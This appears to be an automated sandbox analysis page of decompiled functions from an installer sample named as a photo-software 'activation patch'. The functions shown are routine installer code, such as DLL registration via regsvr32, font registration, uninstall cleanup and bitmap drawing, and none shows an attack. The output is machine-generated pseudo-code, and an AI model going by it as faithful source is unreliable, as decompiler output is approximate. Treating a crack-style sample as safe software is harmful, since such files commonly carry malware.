Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MetricsSystem$B0620
String ID: ,I
API String ID: 2249525592-3697734810
Opcode ID: 99d237f4e6602aa4adb10bbba9f27b4049ed62bd4d0bb7e82590963255ca77bb
Instruction ID: 6bf9c1d71f03a7720a29bcea3f2ffb204bbf738efc2d09f76f7aaa5da4135df4
Opcode Fuzzy Hash: 99d237f4e6602aa4adb10bbba9f27b4049ed62bd4d0bb7e82590963255ca77bb
Instruction Fuzzy Hash: D0116675744304BBEB14EBA5DC83F9E73A8EB04B04F50456AF604E72D1E6B99D808B58

Uniqueness

Uniqueness Score: -1.00%

Function 0045DB44 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045DB44(struct HINSTANCE__* __eax) {
				intOrPtr _t6;
				struct HINSTANCE__* _t7;

				_t7 = __eax;
				 *0x49f08c = GetProcAddress(__eax, "inflateInit_");
				 *0x49f090 = GetProcAddress(_t7, "inflate");
				 *0x49f094 = GetProcAddress(_t7, "inflateEnd");
				 *0x49f098 = GetProcAddress(_t7, "inflateReset");
				if( *0x49f08c == 0 ||  *0x49f090 == 0 ||  *0x49f094 == 0 ||  *0x49f098 == 0) {
					_t6 = 0;
				} else {
					_t6 = 1;
				}
				if(_t6 == 0) {
					 *0x49f08c = 0;
					 *0x49f090 = 0;
					 *0x49f094 = 0;
					 *0x49f098 = 0;
					return _t6;
				}
				return _t6;
			}

0x0045db45
0x0045db52
0x0045db62
0x0045db72
0x0045db82
0x0045db8e
0x0045dbab
0x0045dbaf
0x0045dbaf
0x0045dbaf
0x0045dbb3
0x0045dbb7
0x0045dbbf
0x0045dbc7
0x0045dbcf
0x00000000
0x0045dbcf
0x0045dbd6

APIs

GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045DB4D
GetProcAddress.KERNEL32(00000000,inflate), ref: 0045DB5D
GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045DB6D
GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045DB7D

Strings

inflateInit_, xrefs: 0045DB47
inflateEnd, xrefs: 0045DB67
inflateReset, xrefs: 0045DB77
inflate, xrefs: 0045DB57

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 190572456-3516654456
Opcode ID: 58de473dedc02e4961c84a33a0f5d680adc4af31b5539a839239541ecf730d78
Instruction ID: 6393fdd59b419d4e4f2c5b3e50f991f6d57498fd626e4870853c8bb2a7f4f2ae
Opcode Fuzzy Hash: 58de473dedc02e4961c84a33a0f5d680adc4af31b5539a839239541ecf730d78
Instruction Fuzzy Hash: 1101FFB0D00600DBE724EF369C4672636EAAFA4706F15C43BAD49D66A3E778548CCE1C

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD6C Relevance: 13.7, APIs: 9, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AD6C(intOrPtr* __eax, intOrPtr __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				void* __edi;
				void* __ebp;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr _t70;
				void* _t71;
				void* _t74;
				long _t77;
				void* _t85;
				intOrPtr _t89;
				long _t116;
				intOrPtr _t121;
				intOrPtr* _t139;
				intOrPtr* _t141;
				intOrPtr _t145;
				int* _t147;
				intOrPtr _t151;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				int* _t161;
				intOrPtr* _t163;

				_t148 = __ecx;
				_v8 = __ecx;
				_t147 = __edx;
				_t163 = __eax;
				_t161 = _a8;
				if(_v8 != 0) {
					 *((intOrPtr*)( *__eax + 0x10))();
					_v16 = _t161[2] -  *_t161;
					_v20 = _t161[3] - _t161[1];
					_t151 =  *0x41af68; // 0x1
					E0041B5F8(__eax, __ecx, _t151, _t161);
					if( *0x49c53c == 0) {
						 *0x49c53c = E0041D1B4(1);
						_t145 =  *0x49c53c; // 0x0
						E0041DCF4(_t145, 1);
					}
					_t66 =  *0x49c53c; // 0x0
					if( *((intOrPtr*)( *_t66 + 0x20))() < _v16) {
						_t141 =  *0x49c53c; // 0x0
						_t148 =  *_t141;
						 *((intOrPtr*)( *_t141 + 0x2c))();
					}
					_t68 =  *0x49c53c; // 0x0
					_t153 =  *_t68;
					if( *((intOrPtr*)( *_t68 + 0x1c))() < _v20) {
						_t153 = _v20;
						_t139 =  *0x49c53c; // 0x0
						_t148 =  *_t139;
						 *((intOrPtr*)( *_t139 + 0x28))();
					}
					_t70 =  *0x49c53c; // 0x0
					_t71 = E0041D560(_t70, _t148, _t153);
					_t154 =  *0x41af68; // 0x1
					E0041B5F8(_t71, _t148, _t154, _t161);
					_t74 = E0041D560(_v8, _t148, _t154);
					_t155 =  *0x41af68; // 0x1
					E0041B5F8(_t74, _t148, _t155, _t161);
					_t77 = E0041A4E8(_a4);
					_v12 = SetBkColor( *(E0041D560(_v8, _t148, _t155) + 4), _t77);
					_t85 = E0041D560(_v8, _t148, _t155);
					_t89 =  *0x49c53c; // 0x0
					BitBlt( *(E0041D560(_t89, _t148, _t155) + 4), 0, 0, _v16, _v20,  *(_t85 + 4),  *_t161, _t161[1], 0xcc0020);
					SetBkColor( *(E0041D560(_v8, _t148, _t155) + 4), _v12);
					_t156 =  *0x41af6c; // 0x9
					E0041B5F8(_t163, _t148, _t156, _t161);
					StretchBlt( *(_t163 + 4),  *_t147, _t147[1], _t147[2] -  *_t147, _t147[3] - _t147[1],  *(E0041D560(_v8, _t148, _t156) + 4),  *_t161, _t161[1], _v16, _v20, 0xcc0020);
					_t116 = SetTextColor( *(_t163 + 4), 0);
					_v12 = SetBkColor( *(_t163 + 4), 0xffffff);
					_t121 =  *0x49c53c; // 0x0
					StretchBlt( *(_t163 + 4),  *_t147, _t147[1], _t147[2] -  *_t147, _t147[3] - _t147[1],  *(E0041D560(_t121, _t148, _t156) + 4), 0, 0, _v16, _v20, 0xe20746);
					SetTextColor( *(_t163 + 4), _t116);
					SetBkColor( *(_t163 + 4), _v12);
					return  *((intOrPtr*)( *_t163 + 0xc))();
				}
				return __eax;
			}

0x0041ad6c
0x0041ad75
0x0041ad78
0x0041ad7a
0x0041ad7c
0x0041ad83
0x0041ad8d
0x0041ad95
0x0041ad9e
0x0041ada1
0x0041ada9
0x0041adb5
0x0041adc3
0x0041adca
0x0041adcf
0x0041adcf
0x0041add4
0x0041ade1
0x0041ade6
0x0041adeb
0x0041aded
0x0041aded
0x0041adf0
0x0041adf5
0x0041adfd
0x0041adff
0x0041ae02
0x0041ae07
0x0041ae09
0x0041ae09
0x0041ae0c
0x0041ae11
0x0041ae16
0x0041ae1c
0x0041ae24
0x0041ae29
0x0041ae2f
0x0041ae37
0x0041ae4e
0x0041ae60
0x0041ae75
0x0041ae83
0x0041ae98
0x0041ae9d
0x0041aea5
0x0041aee2
0x0041aeed
0x0041af02
0x0041af16
0x0041af3c
0x0041af46
0x0041af53
0x00000000
0x0041af5c
0x0041af65

APIs

SetBkColor.GDI32(?,00000000), ref: 0041AE49
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041AE83
SetBkColor.GDI32(?,?), ref: 0041AE98
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AEE2
SetTextColor.GDI32(00000000,00000000), ref: 0041AEED
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AEFD
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AF3C
SetTextColor.GDI32(00000000,00000000), ref: 0041AF46
SetBkColor.GDI32(00000000,?), ref: 0041AF53

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: c0d5bcb4e3e136d56fdad79d14bcb2504c33fc8a74749fbb00da5e049b323106
Instruction ID: cd8b06f21d39e7e3a7e3fb9164a1477e2cec4af8eaf2e363a2f859aea8ea57af
Opcode Fuzzy Hash: c0d5bcb4e3e136d56fdad79d14bcb2504c33fc8a74749fbb00da5e049b323106
Instruction Fuzzy Hash: 5B61B4B5A00515EFCB40EFADD985E9AB7F9EF08314B1481AAF518DB251C734ED408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00458954 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00458954(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v84;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				void* _t57;
				void* _t92;
				char _t93;
				intOrPtr _t110;
				void* _t121;
				void* _t124;

				_t119 = __edi;
				_t94 = __ecx;
				_push(__edi);
				_v104 = 0;
				_v108 = 0;
				_v12 = 0;
				_v16 = 0;
				_t121 = __ecx;
				_t92 = __edx;
				_v5 = __eax;
				_push(_t124);
				_push(0x458af0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffff90;
				E0042DD54( &_v12);
				_push(0x458b08);
				E0042C88C(_v12,  &_v104);
				_push(_v104);
				_push("regsvr32.exe\"");
				E00403634();
				if(_v5 != 0) {
					E0040357C( &_v16, 0x458b2c);
				}
				_push(_v16);
				_push(" /s "");
				_push(_t121);
				_push(0x458b08);
				E00403634();
				_t127 = _t92;
				if(_t92 == 0) {
					E00403494( &_v104, "Spawning 32-bit RegSvr32: ");
					E0040357C( &_v104, _v16);
					E004585A0(_v104, _t92, _t94, _t119, _t121);
				} else {
					E00403494( &_v104, "Spawning 64-bit RegSvr32: ");
					E0040357C( &_v104, _v16);
					E004585A0(_v104, _t92, _t94, _t119, _t121);
				}
				E00402934( &_v84, 0x44);
				_v84 = 0x44;
				_t57 = E00403738(_v12);
				if(E00452FC0(_t92, E00403738(_v16), 0, _t127,  &_v100,  &_v84, _t57, 0, 0x4000000, 0, 0, 0) == 0) {
					E00453C98("CreateProcess");
				}
				CloseHandle(_v96);
				_t93 = E00458888( &_v100);
				if(_t93 != 0) {
					_v116 = _t93;
					_v112 = 0;
					E00407D84(0x458ba8, 0,  &_v116,  &_v108);
					E00451C30(0x45,  &_v104, _v108);
					E0040909C(_v104, 1);
					E0040311C();
				}
				_pop(_t110);
				 *[fs:eax] = _t110;
				_push(E00458AF7);
				E00403420( &_v108, 2);
				return E00403420( &_v16, 2);
			}

0x00458954
0x00458954
0x0045895c
0x0045895f
0x00458962
0x00458965
0x00458968
0x0045896b
0x0045896d
0x0045896f
0x00458974
0x00458975
0x0045897a
0x0045897d
0x00458983
0x00458988
0x00458993
0x00458998
0x0045899b
0x004589a8
0x004589b1
0x004589bb
0x004589bb
0x004589c0
0x004589c3
0x004589c8
0x004589c9
0x004589d6
0x004589db
0x004589dd
0x00458a09
0x00458a14
0x00458a1c
0x004589df
0x004589e7
0x004589f2
0x004589fa
0x004589fa
0x00458a2b
0x00458a30
0x00458a47
0x00458a6a
0x00458a71
0x00458a71
0x00458a7a
0x00458a87
0x00458a8b
0x00458a91
0x00458a94
0x00458aa2
0x00458aaf
0x00458abe
0x00458ac3
0x00458ac3
0x00458aca
0x00458acd
0x00458ad0
0x00458add
0x00458aef

APIs

Part of subcall function 0042DD54: GetSystemDirectoryA.KERNEL32 ref: 0042DD67

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458B08,?, /s ",?,regsvr32.exe",?,00458B08), ref: 00458A7A

Strings

0x%x, xrefs: 00458A9D
Spawning 32-bit RegSvr32: , xrefs: 00458A01
Spawning 64-bit RegSvr32: , xrefs: 004589DF
regsvr32.exe", xrefs: 0045899B
D, xrefs: 00458A30
/u, xrefs: 004589B6
CreateProcess, xrefs: 00458A6C
/s ", xrefs: 004589C3

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: 08e2b69254226518e037469fe64771a849ad823fe7b627901a730c964e9643b1
Instruction ID: 80d87ab17c090028f18ddd9dc69d9a9522a7783b235ef4a64a7d04e5292bd67e
Opcode Fuzzy Hash: 08e2b69254226518e037469fe64771a849ad823fe7b627901a730c964e9643b1
Instruction Fuzzy Hash: 8341E470E003486BDB11EF95C842B9DB7B9AF45305F50407FB904BB296DF78AE098B59

Uniqueness

Uniqueness Score: -1.00%

Function 0044D7E4 Relevance: 13.6, APIs: 9, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044D7E4(void* __eax, int __ecx, struct tagRECT* __edx, char _a4, intOrPtr _a8) {
				int _t23;
				CHAR* _t25;
				long _t37;
				int _t44;
				CHAR* _t46;
				long _t53;
				int _t60;
				CHAR* _t62;
				void* _t68;

				_t72 = __ecx;
				_t73 = __edx;
				_t68 = __eax;
				_t74 = _a4;
				if(_a4 == 0) {
					_t23 = E00403574(__eax);
					_t25 = E00403738(_t68);
					return DrawTextA(E0041B524( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t25, _t23, __edx, __ecx);
				}
				E0041ABF4( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104)) + 0x14)), 1, _t74);
				OffsetRect(_t73, 1, 1);
				_t37 = GetSysColor(0x14);
				SetTextColor(E0041B524( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t37);
				_t44 = E00403574(_t68);
				_t46 = E00403738(_t68);
				DrawTextA(E0041B524( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t46, _t44, _t73, _t72);
				OffsetRect(_t73, 0xffffffff, 0xffffffff);
				_t53 = GetSysColor(0x10);
				SetTextColor(E0041B524( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t53);
				_t60 = E00403574(_t68);
				_t62 = E00403738(_t68);
				return DrawTextA(E0041B524( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t62, _t60, _t73, _t72);
			}

0x0044d7ea
0x0044d7ec
0x0044d7ee
0x0044d7f0
0x0044d7f4
0x0044d8ba
0x0044d8c2
0x00000000
0x0044d8da
0x0044d80b
0x0044d815
0x0044d81c
0x0044d834
0x0044d83d
0x0044d845
0x0044d85d
0x0044d867
0x0044d86e
0x0044d886
0x0044d88f
0x0044d897
0x00000000

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044D815
GetSysColor.USER32(00000014), ref: 0044D81C
SetTextColor.GDI32(00000000,00000000), ref: 0044D834
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D85D
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D867
GetSysColor.USER32(00000010), ref: 0044D86E
SetTextColor.GDI32(00000000,00000000), ref: 0044D886
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D8AF
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D8DA

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 70c625a45f7822c9c0c8d15dcd55c3925e6146c24073cdeca57399263d9d2978
Instruction ID: 7afddb25c4ac74ad42c6f663f4adf30dc2f4b2673d3e6822d8b2a46fb9ac5c49
Opcode Fuzzy Hash: 70c625a45f7822c9c0c8d15dcd55c3925e6146c24073cdeca57399263d9d2978
Instruction Fuzzy Hash: AB21AFB46015047FD700FB2ACD8AE9B7BECDF19319B00457A7914EB393C678DE408669

Uniqueness

Uniqueness Score: -1.00%

Function 00499360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90
sleepsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00499360(void* __eflags) {
				long _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t21;
				struct HWND__* _t28;
				void* _t34;
				struct HWND__* _t35;
				void* _t36;
				intOrPtr _t42;
				void* _t43;
				void* _t44;
				intOrPtr _t46;

				E004585A0("Deleting Uninstall data files.", _t34, _t36, _t43, _t44);
				_push(0x49939f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				_t7 =  *0x49f54c; // 0x0
				E00450EC8(_t7, 0);
				_t9 =  *0x49f54c; // 0x0
				E00451104(_t9);
				 *[fs:eax] = 0;
				E0042E814(0x49f54c);
				_t14 =  *0x49f544; // 0x0
				E004073E0(_t14);
				_t16 =  *0x49f548; // 0x0
				E004073E0(_t16);
				if( *0x49f564 != 0) {
					if( *0x49f560 == 0) {
						_t35 =  *0x49f564; // 0x0
					} else {
						_t35 =  *0x49f560; // 0x0
					}
					_v8 = 0;
					if(GetWindowThreadProcessId(_t35,  &_v8) == 0) {
						_t34 = 0;
						__eflags = 0;
					} else {
						_t34 = OpenProcess(0x100000, 0, _v8);
					}
					_t28 =  *0x49f564; // 0x0
					SendNotifyMessageA(_t28, 0x54d, 0, 0);
					if(_t34 != 0) {
						WaitForSingleObject(_t34, 0xffffffff);
						CloseHandle(_t34);
					}
					if( *0x49f010 == 0) {
						Sleep(0x1f4);
					}
				}
				 *0x49d130 = 0;
				_t42 =  *0x49f540; // 0x0
				E00455EA4(0, _t42, 0xfa, 0x32);
				if( *0x49f010 != 0) {
					E00457DB0(0, _t34, _t43, _t44, 0);
				}
				_t21 =  *0x49e62c; // 0x2252410
				return E004246D0(_t21);
			}

0x0049936c
0x00499374
0x00499379
0x0049937c
0x00499381
0x00499386
0x0049938b
0x00499390
0x0049939a
0x004993ae
0x004993b3
0x004993b8
0x004993bd
0x004993c2
0x004993ce
0x004993d7
0x004993e1
0x004993d9
0x004993d9
0x004993d9
0x004993e9
0x004993f8
0x0049940e
0x0049940e
0x004993fa
0x0049940a
0x0049940a
0x00499419
0x0049941f
0x00499426
0x0049942b
0x00499431
0x00499431
0x0049943d
0x00499444
0x00499444
0x0049943d
0x0049944b
0x0049945c
0x00499464
0x00499470
0x00499474
0x00499474
0x00499479
0x00499488

APIs

Part of subcall function 00451104: SetEndOfFile.KERNEL32(?,?,0045CBD2,00000000,0045CD5D,?,00000000,00000002,00000002), ref: 0045110B

Part of subcall function 004073E0: DeleteFileA.KERNEL32(00000000,0049E62C,0049B575,00000000,0049B5CA,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 004073EB

GetWindowThreadProcessId.USER32(00000000,?), ref: 004993F1
OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00499405
SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 0049941F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 0049942B
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00499431
Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00499444

Strings

Deleting Uninstall data files., xrefs: 00499367

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 1570157960-2568741658
Opcode ID: 864dc5737d530f93c94dbe3d8ac2dc956e5e1a8a9637fbe3118d26f43ed90919
Instruction ID: b7a2e365abb4ca1ce7a24153babf5e0292396e8760e8134f6a37584f4bf7a1e8
Opcode Fuzzy Hash: 864dc5737d530f93c94dbe3d8ac2dc956e5e1a8a9637fbe3118d26f43ed90919
Instruction Fuzzy Hash: 8F214470708200AFEB21EF7AEC86B163798DB58759F11453FB901DA1E3D6789C05DA1D

Uniqueness

Uniqueness Score: -1.00%

Function 00471A60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00471A60(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				void* _t31;
				void* _t34;
				char* _t37;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t59;
				void* _t63;
				intOrPtr _t66;

				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t47 = __ecx;
				_t61 = __edx;
				_t63 = __eax;
				_push(_t66);
				_push(0x471b5d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t66;
				_t49 =  *0x0049CBE8;
				if(E0042E2AC(0,  *0x0049CBE8, 0x80000002,  &_v8, 2, 0) != 0) {
					E004585A0("Failed to open Fonts registry key.", __ecx, _t49, __edx, _t63);
				} else {
					_t34 = E00403574(_t63);
					_t37 = E00403738(_t63);
					if(RegSetValueExA(_v8, E00403738(__edx), 0, 1, _t37, _t34 + 1) != 0) {
						E004585A0("Failed to set value in Fonts registry key.", _t47, _t49, _t61, _t63);
					}
					RegCloseKey(_v8);
				}
				if(_t47 != 0) {
					while(AddFontResourceA(E00403738(_t63)) == 0) {
						_t52 =  &_v16;
						E00451C30(0x3a,  &_v16, "AddFontResource");
						E0042EB3C(_v16,  &_v16,  &_v12);
						_t59 =  *0x49ed1c; // 0x230bd50
						_t31 = E0046FC60(_v12, _t47, _t52, _t59, _t61, _t63, __eflags);
						__eflags = _t31;
						if(_t31 == 0) {
							continue;
						}
						goto L9;
					}
					SendNotifyMessageA(0xffff, 0x1d, 0, 0);
				}
				L9:
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x471b64);
				return E00403420( &_v16, 2);
			}

0x00471a63
0x00471a65
0x00471a67
0x00471a69
0x00471a6a
0x00471a6b
0x00471a6c
0x00471a6e
0x00471a70
0x00471a74
0x00471a75
0x00471a7a
0x00471a7d
0x00471a8f
0x00471aa4
0x00471aea
0x00471aa6
0x00471aa8
0x00471ab1
0x00471ace
0x00471ad5
0x00471ad5
0x00471ade
0x00471ade
0x00471af1
0x00471af3
0x00471b16
0x00471b20
0x00471b2b
0x00471b33
0x00471b39
0x00471b3e
0x00471b40
0x00000000
0x00000000
0x00000000
0x00471b40
0x00471b0f
0x00471b0f
0x00471b42
0x00471b44
0x00471b47
0x00471b4a
0x00471b5c

APIs

Part of subcall function 0042E2AC: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00485FB3,?,00000001,?,?,00485FB3,?,00000001,00000000), ref: 0042E2C8

RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00471B5D,?,?,?,?,00000000), ref: 00471AC7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00471B5D), ref: 00471ADE
AddFontResourceA.GDI32(00000000), ref: 00471AFB
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00471B0F

Strings

Failed to open Fonts registry key., xrefs: 00471AE5
AddFontResource, xrefs: 00471B19
Failed to set value in Fonts registry key., xrefs: 00471AD0

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: 84f6a41e8c6dd6550177eab81c252e77b7800c9e9bc3319483211bedbc9b2c33
Instruction ID: e418864d87a496604354a2259d3816e8ecf3f11e764263395734e4855b1f90ef
Opcode Fuzzy Hash: 84f6a41e8c6dd6550177eab81c252e77b7800c9e9bc3319483211bedbc9b2c33
Instruction Fuzzy Hash: 5B2181707402047BDB10EA6A9C42F9A679CDB45704F60C077B904EB3D2EA7CED05966D

Uniqueness

Uniqueness Score: -1.00%

Function 00464224 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00464224(intOrPtr* __eax, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HICON__* _v8;
				struct _SHFILEINFO _v360;
				void* __esi;
				void* __ebp;
				void* _t14;
				int _t18;
				intOrPtr* _t37;
				void* _t49;
				void* _t53;
				void* _t55;
				intOrPtr _t56;

				_t53 = _t55;
				_t56 = _t55 + 0xfffffe9c;
				_push(_t49);
				_t37 = __eax;
				 *((char*)(__eax + 0xfc)) = 0;
				E004168A0(__eax, __edi, _t49, _t53);
				_t14 = E00403400(_t37 + 0x100);
				if(( *(_t37 + 0x1c) & 0x00000010) != 0) {
					return _t14;
				} else {
					if((GetVersion() & 0x000000ff) >= 6 &&  *0x49e718 != 0) {
						 *0x49e718(E00418670(_t37), L"Explorer", 0);
						SendMessageA(E00418670(_t37), 0x112c, 4, 4);
					}
